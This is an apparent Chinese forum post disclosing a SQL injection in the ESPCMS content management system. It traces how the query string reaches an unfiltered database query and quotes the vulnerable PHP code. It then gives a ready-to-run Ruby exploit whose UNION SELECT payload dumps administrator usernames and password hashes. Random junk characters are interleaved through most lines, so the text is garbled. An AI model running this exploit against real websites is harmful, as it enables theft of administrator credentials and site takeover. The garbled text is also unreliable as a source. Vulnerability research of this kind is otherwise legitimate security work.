0×0 漏洞概述0×1 漏洞细节
0 t% y9 X: [7 |7 c4 i; a* i0×2 PoC6 H& W: |& C+ O- `" M: T+ M
' `+ e9 N+ B6 W' h
8 H; p+ a" i0 e, F2 [) z( w
! ]2 B) S5 g1 k
0×0 漏洞概述
: `. `4 t2 c, D# ?4 k" p$ u, [) p- v1 g* B1 C N& s0 g* [3 p
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。: o, J" b$ _4 o: i# G
其在处理传入的参数时考虑不严谨导致SQL注入发生
/ U( }1 ^8 u( a2 o K# R, r* F, c7 Y8 _
/ c* n8 j" m. Y0 B5 @0×1 漏洞细节9 L# _& D9 V& _# m
0 Q; T( f3 w5 E7 C$ \, }% U2 W- t
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。2 D1 G! y% U9 C- C( U/ L8 ~" Z
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。- o) o1 \4 S7 ~( z' |, \+ ^+ v: l
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。# Y" q; \: n( ~8 t: |$ Y/ b8 f1 p0 c9 j
( [" I: q! e# o7 b/ Z( @' B. I# H在/interface/3gwap_search.php文件的in_result函数中:
5 T, n" L: ~+ x) F9 m4 F" C% \ }4 }& d
* U) r5 [ Q. q6 B4 [' }* `. T" u* {& n) K
function in_result() {
5 v7 Y9 [" a3 O6 o. j ... ... ... ... ... ... ... ... ...
3 i0 H; o. a- ` $urlcode = $_SERVER[ 'QUERY_STRING '];- K1 G# l2 P8 S
parse_str(html_entity_decode($urlcode), $output);0 x$ ^3 r" j. O5 T" j( s( I2 t
. B5 \% U% u5 t1 m. j2 J ... ... ... ... ... ... ... ... ...
/ F8 z% M, D8 u" \- p4 T0 ~1 ^ if (is_array($output['attr' ]) && count($output['attr']) > 0) {
: ?6 ?; l3 u6 Z4 h( d4 Y8 `9 m; E i5 u) ~1 k* c8 S# F
$db_table = db_prefix . 'model_att';( G# S" x( x3 ?* F. _) K2 C
; N* \( S7 m' _: \+ x* T$ k% H; h foreach ($output['attr' ] as $key => $value) {
6 @0 n8 Y. X! k7 {8 A1 O2 j* q if ($value) {
1 K1 `2 q) y7 O' |1 v3 z0 s3 q' h
+ \$ a$ t/ U1 ~$ t* G $key = addslashes($key); U% E1 x/ x- y8 o* W& N6 J
$key = $this-> fun->inputcodetrim($key);& f& h) t" M% d! A' M* B& v5 ^ f
$db_att_where = " WHERE isclass=1 AND attrname='$key'";, ?; ]- _0 w# L
$countnum = $this->db_numrows($db_table, $db_att_where);
b a% M- n! H# [/ c if ($countnum > 0) {
) x' q( V4 F: q3 _. W; |$ y $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;$ k7 \9 E; ^1 L7 h6 N) a! u
}
: ?3 ~4 r/ a0 i `3 g }* m" I, Q% _: |- v
}: M# {" u' d7 D+ r
}( h0 J' b/ D5 D5 @
if (!empty ($keyword) && empty($keyname)) {
* n( `- L& A; \7 B* U0 z' ^: J $keyname = 'title';
" {! @; e0 v9 [9 J8 ?6 k $db_where.= " AND a.title like '%$keyword%'" ;
4 `$ `$ E6 ?4 H3 O6 C } elseif (!empty ($keyword) && !empty($keyname)) {
, `3 f' v( _8 C% [ $db_where.= " AND $keyname like '% $keyword%'";
0 ]- J$ _" ]/ U8 T }
% G" ^9 k9 Q. x, K6 R. B" g $pagemax = 15;
$ c0 u- s) N1 I: X6 r9 f. a' J) f
) V5 E. j0 g7 Y: g2 [( O5 G $pagesylte = 1;
& X' z- h+ s" u: E5 W2 N2 [1 t) P$ i/ C6 U& U+ o* I/ y
if ($countnum > 0) {9 O- a4 f9 n! N1 G8 @/ }
1 S1 t& c% R9 n: d+ T( N: G $numpage = ceil($countnum / $pagemax);: O$ B/ |( O- J" u& n H2 U7 `
} else {
- C/ t7 e2 r4 ~, m( p, m $numpage = 1;. H4 f) o! [$ ~7 |) [
}
6 b& H( s g/ z $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;; ?7 G- ?, C5 n% d6 x3 s8 z2 R
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
4 D6 G% X2 J l' [6 u$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
/ ]8 a! s3 M# H: K# i( n( E, q3 X. ] ... ... ... ... ... ... ... ... ...
* B9 Q& k8 w* P$ s: O, X& G0 k }
" z3 G2 l( M6 Q2 e
$ x2 _/ |& f# G& Q
! R% V m" I3 F) x" F; z0×2 PoC* x- c$ f9 `/ d" w% ~7 D, o, N, f# j
& F8 h2 x! G5 o0 ~% i2 L8 V* b
# o- W# X# C- k+ j% X7 [! Y) z* X c8 I! m; A% T
require "net/http"5 P: g1 ]' a* J$ V$ z, S' U* ~: t
) d1 \4 S X9 {* _) Bdef request(method, url)
2 F! P: y3 n1 Q' J if method.eql?("get")
B+ X2 ?) {1 L1 k" D8 @' `3 X uri = URI.parse(url): B7 D g' z: K W8 J L! S m
http = Net::HTTP.new(uri.host, uri.port)/ `5 O+ s: J3 ]0 B
response = http.request(Net::HTTP::Get.new(uri.request_uri))! ~+ w7 r+ J. X/ K# l
return response9 X4 [; i9 Z0 e N$ H9 O) p( r9 Z
end
~1 ~7 ?, e/ M5 J* Rend2 W( X H2 ~8 o* @$ U+ P0 S3 U- H1 D/ u1 u
2 ~: B6 u; H' D0 }7 T9 t. K |7 _doc =<<HERE
$ ^5 g, `7 d1 A; {+ O- K-------------------------------------------------------- d1 B- B/ h* @2 p1 n
Espcms Injection Exploit( o0 h% }2 f7 J3 |- }
Author:ztz/ |; f% F, K# s Q1 O7 A
Blog:http://ztz.fuzzexp.org/
0 P; F4 j7 Z8 A+ F) w. U) [; r-------------------------------------------------------
9 R; D3 W/ x% {3 e. w7 i( d% o1 Q' ~: v/ B3 x
HERE
+ v6 z4 b3 v8 D U( ~' u9 N& l6 l, D3 J5 t( |+ Z9 w
usage =<<HERE+ C2 o% d- }! x" ^6 H; ?$ d0 ]
Usage: ruby #{$0} host port path9 b7 f$ F1 r: g& r
example: ruby #{$0} www.target.com 80 /. c, T7 P4 e e5 Z3 d" ?2 i
HERE
& {! S2 D& f4 w: `1 G! _$ ~- D. f6 w
) v" D5 s, [" O6 E, pputs doc7 z, _% r0 C% u9 a( D
if ARGV.length < 3
5 U' ?# I( ^. f# y puts usage. [3 o2 _1 Y7 P3 q. K1 e9 L1 ^
else b/ a4 V y F3 Q
$host = ARGV[0]4 \4 g! B' c' Y5 j( `3 o
$port = ARGV[1] m) `( X0 D4 M; ~
$path = ARGV[2]: ^( o# n# s* `% L) \
1 {9 ~- `0 G) U' H0 E puts "send request...". U+ k, W% y# i/ X |
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&- n; ]% L% e5 Z7 W8 c+ o( X6 c
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13% v- D H( }: l) u) S, n( S
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27' l& ~9 J" T5 Z& q0 r
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"+ V2 A p' T u9 x; ~9 [
response = request("get", url)( l- l) \" F( o/ k- c
result = response.body.scan(/\w+&\w{32}/)
0 Q3 c# m" Q/ E, l" ~1 s" V puts result
@# S( I0 B* b g8 jend
8 Y# Q3 n3 X/ m( [9 o' Z" m
0 G' J! E0 L! C: K* u! Z |
发表于 2013-7-27 18:31:52
收藏
支持
反对